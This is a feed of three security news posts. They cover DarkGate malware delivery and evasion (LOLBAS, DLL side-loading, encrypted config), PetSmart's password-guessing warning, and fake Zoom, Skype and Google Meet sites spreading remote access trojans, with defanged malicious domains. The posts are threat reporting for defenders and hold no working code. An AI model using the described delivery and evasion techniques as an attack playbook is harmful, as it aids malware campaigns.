DarkGate Malware Abusing Cloud Storage & SEO Following Delivery Over Teams

DarkGate loader delivery surged after the Qakbot takedown, with financially motivated actors like TA577 and ransomware groups (BianLian, Black Basta) using it to target financial institutions (US, Europe) for double extortion.

It establishes an initial foothold and deploys info-stealers, ransomware, and remote access tools to maximize data exfiltration and extortion gains by utilizing legitimate channels (DoubleClick ads, cloud storage) and phishing emails for distribution.

Overview of DarkGate version 5 activity

Similarities with IcedID delivery methods suggest that threat actors may be cooperating or sharing their tradecraft.

@import url(‘https://fonts.googleapis.com/css2?family=Poppins&display=swap’); @import url(‘https://fonts.googleapis.com/css2?family=Poppins&family=Roboto&display=swap’); { margin: 0; padding: 0; text-decoration: none; } .container{ font-family: roboto, sans-serif; width: 90%; border: 1px solid lightgrey; padding: 20px; background: linear-gradient(2deg,#E0EAF1 100%,#BBD2E0 100%); margin: 20px auto ; border-radius: 40px 10px; box-shadow: 5px 5px 5px #e2ebff; } .container:hover{ box-shadow: 10px 10px 5px #e2ebff; } .container .title{ color: #015689; font-size: 22px; font-weight: bolder; } .container .title{ text-shadow: 1px 1px 1px lightgrey; } .container .title:after { width: 50px; height: 2px; content: ‘ ‘; position: absolute; background-color: #015689; margin: 20px 0; } .container h2{ line-height: 40px; margin: 5px 3px; font-weight: bolder; } .container a{ color: #170d51; } .container p{ font-size: 18px; line-height: 30px; margin: 10px 0; } .container button{ padding: 15px; background-color: #4469f5; border-radius: 10px; border: none; background-color: #00456e ; font-size: 16px; font-weight: bold; margin-top: 5px; } .container button:hover{ box-shadow: 1px 1px 15px #015689; transition: all 0.2S linear; } .container button a{ color: white; } hr{ / display: none; / } .listWrapper { padding-left: 4rem; /*list-style-type: none;/ } .listWrapper li { /padding-left: 2rem; background-image: url(star.svg);/ background-position: 0 0; line-height: 2rem; background-size: 1.6rem 1.6rem; background-repeat: no-repeat; }

Download Free CISO’s Guide to Avoiding the Next Breach

Are you from The Team of SOC, Network Security, or Security Manager or CSO? Download Perimeter’s Guide to how cloud-based, converged network security improves security and reduces TCO.

• Understand the importance of a zero trust strategy

• Complete Network security Checklist

• See why relying on a legacy VPN is no longer a viable security strategy

• Get suggestions on how to present the move to a cloud-based network security solution

• Explore the advantages of converged network security over legacy approaches

• Discover the tools and technologies that maximize network security

Adapt to the changing threat landscape effortlessly with Perimeter 81’s cloud-based, unified network security platform.

Download Perimeter 81 Free PDF Guide </html

DarkGate is a malware-as-a-service advertised in June 2023 that offers remote access, data theft, and privilege escalation by using multiple techniques to evade, including a custom crypter, polymorphism, and anti-VM.

Persona RastaFarEye is advertising DarkGate on a cybercrime forum.

It also utilizes LOLBAS tools to download a malicious AutoIt script that decrypts the DarkGate payload, injects it into a process, and establishes persistence through registry keys and a rootkit module.

*DarkGate infection chain through PDF lure. *

Attackers primarily target financial institutions like BDK, a major German bank, using phishing emails with lures relevant to the target’s industry and delivering the DarkGate payload through embedded links in PDF attachments.

*The delivered malicious PDF attachment targeted the BDK. *

The links redirect victims to download pages hosted on compromised websites.

To evade detection, DarkGate operators have incorporated innovative techniques like abusing DNS TXT records to execute malicious Windows commands that download and install the malware.

* Malware delivery similarities between DarkGate and IcedID.*

EclecticIQ analysts compared DarkGate and IcedID malware, finding shared tactics like obfuscated strings, using PING.exe to check internet connectivity, CURL.exe for downloading payloads, and decoy PDF documents.

They differed in execution tools (DarkGate: Cscript.exe, IcedID: Rundll32.exe) and payload types (DarkGate: VBS script, IcedID: disguised DLL).

Showing the example of DoubleClick Ad service abuse.

For DarkGate delivery, attackers abused open redirects in Google’s DoubleClick ads with emails containing links disguised as invoices.

Since January 2024, DarkGate has shifted to CAB and MSI formats, likely to evade detection.

DarkGate version 6.1.6 employs DLL side-loading for evasion, where a malicious DLL is loaded into legitimate applications (e.g., VLC, iTunesHelper) through a compromised MSI installer.

Dropped DarkGate payloads

The payload then decrypts itself using a key within a fake sqlite3.dll and drops a script into C:\temp, while decrypting again using a separate key and launching the final DarkGate payload.

Decrypted configuration reveals the command-and-control server.

The version also features a new configuration decryption routine using XOR encryption to hide C2 server information and other operational parameters, making it more difficult for signature-based detection.

DarkGate is a Malware-as-a-Service (MaaS) that steals information like usernames, CPU information, and anti-virus information from the victim device after gaining an initial foothold.

Decrypted C2 activity showing the version of Darkgate.

It then uses Living Off the Land Binaries (LOLBAS) like wscript.exe and cscript.exe to execute a VBS script.

v

Network traffic analysis can be used to detect suspicious patterns like downloads from unusual domains or suspicious Curl.exe activity and YARA rules can also be used to detect the final payload on the infected device.

The IOCs include suspicious user agent strings, command and control (C2) server domains, payload downloader URLs with malicious zip files, and multiple file hashes, which can be used to identify infected systems, block malicious traffic, and improve threat detection.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

The post DarkGate Malware Abusing Cloud Storage & SEO Following Delivery Over Teams appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

PetSmart warns of Active Password Cracking Attacks

PetSmart, Inc. is a renowned retail chain operating in the United States, Canada, and Puerto Rico.

It offers a comprehensive range of pet products and services such as pet supplies, grooming, training, and in-store adoptions.

PetSmart prides itself on being a trusted partner to pet parents and a dedicated advocate for pets’ well-being.

PetSmart has issued a warning regarding an uptick in password-guessing attempts on their website.

The pet retail giant reassures that there has been no breach of their systems, but the increased activity has prompted them to take precautionary measures.

Security Measures in Place

PetSmart’s vigilant security tools detected the unusual activity, which led to the company’s decision to deactivate the passwords of potentially affected accounts.

@import url(‘https://fonts.googleapis.com/css2?family=Poppins&display=swap’); @import url(‘https://fonts.googleapis.com/css2?family=Poppins&family=Roboto&display=swap’); *{ margin: 0; padding: 0; text-decoration: none; } .container{ font-family: roboto, sans-serif; width: 90%; border: 1px solid lightgrey; padding: 20px; background: linear-gradient(2deg,#E0EAF1 100%,#BBD2E0 100%); margin: 20px auto ; border-radius: 40px 10px; box-shadow: 5px 5px 5px #e2ebff; } .container:hover{ box-shadow: 10px 10px 5px #e2ebff; } .container .title{ color: #015689; font-size: 22px; font-weight: bolder; } .container .title{ text-shadow: 1px 1px 1px lightgrey; } .container .title:after { width: 50px; height: 2px; content: ‘ ‘; position: absolute; background-color: #015689; margin: 20px 8px; } .container h2{ line-height: 40px; margin: 2px 0; font-weight: bolder; } .container a{ color: #170d51; } .container p{ font-size: 18px; line-height: 30px; } .container button{ padding: 15px; background-color: #4469f5; border-radius: 10px; border: none; background-color: #00456e ; font-size: 16px; font-weight: bold; margin-top: 5px; } .container button:hover{ box-shadow: 1px 1px 15px #015689; transition: all 0.2S linear; } .container button a{ color: white; } hr{ / display: none; / } Integrate ANY.RUN in your company for Effective Malware Analysis

Are you from SOC and DFIR teams? – Join With 400,000 independent Researchers

Malware analysis can be fast and simple. Just let us show you the way to:

• Interact with malware safely

• Set up virtual machine in Linux and all Windows OS versions

• Work in a team

• Get detailed reports with maximum data

If you want to test all these features now with completely free access to the sandbox: ..

Analyze malware in ANY.RUN for free

Customers will need to reset their passwords the next time they attempt to log in to petsmart.com.

The company has provided straightforward instructions for password reset:

users can click the “forgot password” link on the login page or directly navigate to www.petsmart.com/account/ to initiate the process.

A Call for Stronger Password Hygiene

The PetSmart Data Security Team emphasizes the importance of robust password practices in the face of persistent threats from online fraudsters.

These malicious actors are known to obtain usernames and passwords and test them across various platforms, including those like PetSmart’s.

According to a recent tweet by Dark Web Informer, PetSmart has notified its customers about a security breach in its system via email.

.

[

@PetSmart

](https://twitter.com/PetSmart?ref_src=twsrc%5Etfw)

sent out the following email.

[

#Ransomware

](https://twitter.com/hashtag/Ransomware?src=hash&ref_src=twsrc%5Etfw)

[

#DarkWebInformer

](https://twitter.com/hashtag/DarkWebInformer?src=hash&ref_src=twsrc%5Etfw)

[

#Cybersecurity

](https://twitter.com/hashtag/Cybersecurity?src=hash&ref_src=twsrc%5Etfw)

[

#Cyberattack

](https://twitter.com/hashtag/Cyberattack?src=hash&ref_src=twsrc%5Etfw)

[

#Cybercrime

](https://twitter.com/hashtag/Cybercrime?src=hash&ref_src=twsrc%5Etfw)

[

#PetSmart

](https://twitter.com/hashtag/PetSmart?src=hash&ref_src=twsrc%5Etfw)

[

pic.twitter.com/Rib9SHtcaD

](https://t.co/Rib9SHtcaD)

— Dark Web Informer (@DarkWebInformer)

[

March 6, 2024

](https://twitter.com/DarkWebInformer/status/1765476096760262942?ref_src=twsrc%5Etfw)

To combat this, the retailer advises customers to create strong, unique passwords for their accounts and to update them several times a year.

The use of different passwords for separate important accounts is also strongly recommended.

Understanding the inconvenience this may cause to their patrons, PetSmart extends its customer service support for any questions or concerns arising from this issue.

Customers can reach out via email at customercare@petsmart.com.

Maintaining Vigilance

PetSmart’s prompt response to the detected password-cracking attempts is part of its ongoing commitment to customer data security.

The company’s efforts to communicate with its customers about the potential risks and the steps being taken to mitigate them reflect an industry-wide push towards greater transparency and proactive security measures in the digital age.

You can block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits, with Perimeter81 malware protection. All are incredibly harmful, can wreak havoc, and damage your network.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

The post PetSmart warns of Active Password Cracking Attacks appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

Hackers use Zoom & Google Meet to Attack Android & Windows users

A threat actor has been identified as creating fraudulent Skype, Google Meet, and Zoom websites to distribute malware, explicitly targeting Android and Windows users.

This article delves into the details of this malicious campaign and explains how users can identify and protect themselves from these threats.

Attack Sequence:

A threat actor distributes various malware families through fake Skype, Zoom, and Google Meet websites.

Remote Access Trojans (RATs) such as SpyNote RAT for Android, NjRAT and, DCRat for Windows are being distributed.

@import url(‘https://fonts.googleapis.com/css2?family=Poppins&display=swap’); @import url(‘https://fonts.googleapis.com/css2?family=Poppins&family=Roboto&display=swap’); *{ margin: 0; padding: 0; text-decoration: none; } .container{ font-family: roboto, sans-serif; width: 90%; border: 1px solid lightgrey; padding: 20px; background: linear-gradient(2deg,#E0EAF1 100%,#BBD2E0 100%); margin: 20px auto ; border-radius: 40px 10px; box-shadow: 5px 5px 5px #e2ebff; } .container:hover{ box-shadow: 10px 10px 5px #e2ebff; } .container .title{ color: #015689; font-size: 22px; font-weight: bolder; } .container .title{ text-shadow: 1px 1px 1px lightgrey; } .container .title:after { width: 50px; height: 2px; content: ‘ ‘; position: absolute; background-color: #015689; margin: 20px 8px; } .container h2{ line-height: 40px; margin: 2px 0; font-weight: bolder; } .container a{ color: #170d51; } .container p{ font-size: 18px; line-height: 30px; } .container button{ padding: 15px; background-color: #4469f5; border-radius: 10px; border: none; background-color: #00456e ; font-size: 16px; font-weight: bold; margin-top: 5px; } .container button:hover{ box-shadow: 1px 1px 15px #015689; transition: all 0.2S linear; } .container button a{ color: white; } hr{ / display: none; / } Integrate ANY.RUN in your company for Effective Malware Analysis

Are you from SOC and DFIR teams? – Join With 400,000 independent Researchers

Malware analysis can be fast and simple. Just let us show you the way to:

• Interact with malware safely

• Set up virtual machine in Linux and all Windows OS versions

• Work in a team

• Get detailed reports with maximum data

If you want to test all these features now with completely free access to the sandbox: ..

Analyze malware in ANY.RUN for free

The attacker utilized shared web hosting with all fake sites hosted on a single IP address in Russia.

Malicious URLs closely resemble legitimate websites, making it challenging for users to differentiate.

Attack chain and execution flow for Android and Windows campaigns (source: Zscaler)

The attacker’s modus operandi involves luring users to click on fake sites where clicking on the Android button initiates the download of a malicious APK file, while clicking on the Windows button triggers the download of a BAT file, leading to a RAT payload download.

Rest assured that Zscaler’s ThreatLabz team diligently monitors and shares expert insights on all potential threats to keep you and the wider community safe.

Skype:

The first fake site discovered was join-skype[.]info, designed to deceive users into downloading a fake Skype application.

The Windows button is directed to Skype8.exe and the Google Play button is pointed at Skype.apk.

The fraudulent Skype website, with a fake domain meant to resemble the legitimate Skype domain. (Source urlscan.io.)

Google Meet:

Another fake site, online-cloudmeeting[.]pro, mimicking Google Meet, was identified. The site provided links to download fake Skype applications for Android and Windows.

The Windows link led to a BAT file downloading DCRat, while the Android link led to a SpyNote RAT APK file.

The fake Google Meet page, showing the fraudulent domain in the address bar for a fake Google Meet Windows application links to a malicious BAT file that downloads and executes malware. (Source: Zscaler)

Zoom:

Later, a fake Zoom site, us06webzoomus[.]pro, emerged with links to download SpyNote RAT for Android and DCRat for Windows.

The site closely resembled a legitimate Zoom meeting ID.

The fake Zoom page shows a domain similar to the real Zoom domain in the address bar and a link to the malicious APK file that contains SpyNote RAT when the Google Play button is clicked. (Source: Zscaler

Open Directories:

The fake Google Meet and Zoom sites also contained additional malicious files like driver.exe and meet.exe (NjRAT), indicating potential future campaigns utilizing these files.

Example of additional malicious files hosted on the websites hosting fake online meeting applications. (Source: Zscaler)

Businesses are at risk of impersonation attacks through online meeting applications, leading to the distribution of RATs that can compromise sensitive data.

Vigilance, robust security measures, regular updates, and patches are crucial in safeguarding against evolving cyber threats. Proactive measures are essential as cyber threats evolve.

Zscaler’s ThreatLabz team remains dedicated to monitoring these threats and sharing insights with the community.

You can block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits, with Perimeter81 malware protection. All are incredibly harmful, can wreak havoc, and damage your network.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter

The post Hackers use Zoom & Google Meet to Attack Android & Windows users appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder